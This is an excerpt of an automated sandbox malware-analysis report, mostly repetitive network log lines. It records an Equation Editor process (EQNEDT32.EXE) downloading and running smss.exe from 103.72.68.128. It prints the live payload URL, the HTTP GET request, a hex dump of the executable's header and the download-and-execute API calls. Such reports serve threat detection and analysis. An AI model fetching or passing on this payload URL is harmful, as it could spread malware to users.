Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80

Source: global traffic

TCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80

Source: Joe Sandbox View

ASN Name: FARIYA-PKFariyaNetworksPvtLtdPK FARIYA-PKFariyaNetworksPvtLtdPK

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 16 Oct 2023 07:58:22 GMTServer: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.2.34Last-Modified: Mon, 16 Oct 2023 00:46:09 GMTETag: "136c20-607cabb6cc4a3"Accept-Ranges: bytesContent-Length: 1272864Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad f1 28 81 e9 90 46 d2 e9 90 46 d2 e9 90 46 d2 2a 9f 19 d2 eb 90 46 d2 e9 90 47 d2 77 90 46 d2 2a 9f 1b d2 e6 90 46 d2 bd b3 76 d2 e3 90 46 d2 2e 96 40 d2 e8 90 46 d2 52 69 63 68 e9 90 46 d2 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 e3 d4 f6 5d 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 60 00 00 00 d0 01 00 00 04 00 00 35 32 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 c0 05 00 00 04 00 00 f5 11 14 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 30 74 00 00 a0 00 00 00 00 a0 03 00 08 1d 02 00 00 00 00 00 00 00 00 00 08 54 13 00 18 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 7d 5f 00 00 00 10 00 00 00 60 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 3e 12 00 00 00 70 00 00 00 14 00 00 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 18 a8 01 00 00 90 00 00 00 04 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 60 01 00 00 40 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 08 1d 02 00 00 a0 03 00 00 1e 02 00 00 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic

HTTP traffic detected: GET /S1510M/smss.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.72.68.128Connection: Keep-Alive

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_035303C0 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,

2_2_035303C0

Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128

Source: EQNEDT32.EXE, 00000002.00000002.413445105.000000000065F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.477317406.000000000063F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://103.72.68.128/S1510M/smss.exe
Source: EQNEDT32.EXE, 00000009.00000002.477317406.000000000063F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://103.72.68.128/S1510M/smss.exeeanO
